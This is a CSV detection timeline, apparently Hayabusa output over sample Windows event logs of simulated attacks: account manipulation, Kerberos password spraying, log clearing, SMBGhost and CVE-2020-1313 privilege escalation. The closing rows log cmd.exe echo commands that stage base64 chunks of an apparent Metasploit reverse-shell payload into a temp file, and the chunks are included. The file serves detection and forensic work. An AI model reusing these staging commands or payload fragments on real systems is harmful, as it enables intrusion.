0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 
+09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,../hayabusa-rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,../hayabusa-rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Global Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup_DomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-13 04:45:00.670 
+09:00,rootdc1.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: FAKE-COMPUTER$ | SID: S-1-5-21-4230534742-2542757381-3142984815-1168,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,../hayabusa-rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx +2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,LatMov,Protected Storage Service Access,,../hayabusa-rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx +2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: 
-,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: bob | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: 
-,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: 172.16.66.1 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: ::ffff:172.16.66.1 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-25 02:20:29.872 +09:00,LAPTOP-JU4M3I0E,10,high,,Process Access_Sysmon Alert,Credential Access - TeamViewer MemAccess | Src Process: C:\Users\bouss\AppData\Local\Temp\frida-b4f3ceb41e16327436594aec059ee5d5\frida-winjector-helper-32.exe | Tgt Process: C:\Program Files (x86)\TeamViewer\TeamViewer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x147a | Src PID: 18192 | Src PGUID: 00247C92-185D-5F1B-0000-0010667A1211 | Tgt PID: 2960 | Tgt PGUID: 00247C92-1562-5F1B-0000-0010318FFE10,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_teamviewer-dumper_sysmon_10.evtx +2020-07-27 07:26:14.522 
+09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7400 | Src PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400 | Tgt PID: 584 | Tgt PGUID: 747F3D96-F938-5F1D-0000-00104B500000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3660 | PGUID: 747F3D96-0306-5F1E-0000-0010E15F3100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 7400 | PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network 
Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-F935-5F1D-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\cmdLine: c:\windows\system32\cmd.exe | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\startArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New 
UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\pauseArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\queuedTime: QWORD (0x01d6667a-0xac806dc2) | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-08-02 07:58:09.443 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x414 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:09.721 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:09.995 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x106c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:10.269 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IHsEQQA5bjUAuwAH1ajfhfFABqpn0EAo0RAQQCjBBgDADMKxUhPjgBXjUUM5iGOc6pRx+HwF0EARNJABJUdQDxBUG7WTAAAaOBfQADo2KQAAIPEBFNTU2hMQKcA6Ds+ANSLVQyGIgiLYEx+QQBSUI1V9FFS6GRKAACLVfSNRfyNTftQUWgU0kABUujeSgA3hcAPhZoEPEqLNWj6QKoPvkX7g8Bag/g5D4dmBAAAM7iKiAgXQAD/JLaYFkAAi1X8UsAVbMFAs4PEBDvDoxBUnnAPsT0E0C1o+M9AE+htLAAA6SuTAADHBdQCQQABAAAA6R8Efk+JHRRZQADpFAQrAItF/FD/FVOh2ACjGPpAq+kWMgAAi02l2v8LbMGPAKOoAkEA6enPAAA5HWACLAB+DWgc0UAAzhQLAABuxATHJmACZAD/////6USc>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc48 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:10.544 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1184 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:10.819 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x224 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:11.094 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xec4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:11.368 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
eOOLdQxWjUWIaniEVuiJaAAAi00IwBXIwEAArFGDwkBorN5AAIz2FYCuQAChrAJBAIPEFGPAdMxQaNfS3fU6FaC9zgCDxAhW/xVwwWEAXpCQRJDMkA6Q2ZC8OVWL7IPsFNRWuXUIV4tGFIlFwehJGgAAS6ALMgCJFaQLQQDM2ItGD4XAzvp1QIsNBGoAagBR6JaLAADNnjgIAACJvjwIAABcRhgAAAC8ixVUF7MAiVZzUbeQQQCFwHQ7oXACQQDNygPIiU776wKfjjgIpDOhKNAXAIsV8tA8AI/Ii4Y8CAAAE8I7+A+P5QAAAHwIO/4Ph6YAAACL3hiLHTDQQACLRgSNY3UDKFEWUOitawAAhRIqM4PBC8TRPWj9CgB0Jz3ZSQoAdLmYV/0KAKUZPST9CgB0Ej2hw5MAtwsOsyMLABWlpgAANIuoCIsdoAJBAIv6pAJBAAPcg9cviR2gAkEAiT2kIEEAi1YYi042A9boyIlWGImCtg+F7Jr1/8dGCN0AAC/oNEoAZaOgC0EAiRWkC10AkFYEibFACAAAMw2kC0FyuAEAAAAsRfBm1EX0iY5ECAAAi+trF/YcjUXsiU74UOqJzvzGH0BHAF9eW/zlXcN04NReAP8VZMFAX1boahoAAIPECMZeW4vlXcOLHbwCQQBovNRAAEOJJLwCQQAxq2TBGOhW6EIaAACDxAhfXluL5V3DkJCQkJCQkJBVi+yz7LzGAACLRZmVwHSG9YsJqwAQoAtBMokVpAtBPusLixWkC0EAoaA4QQDT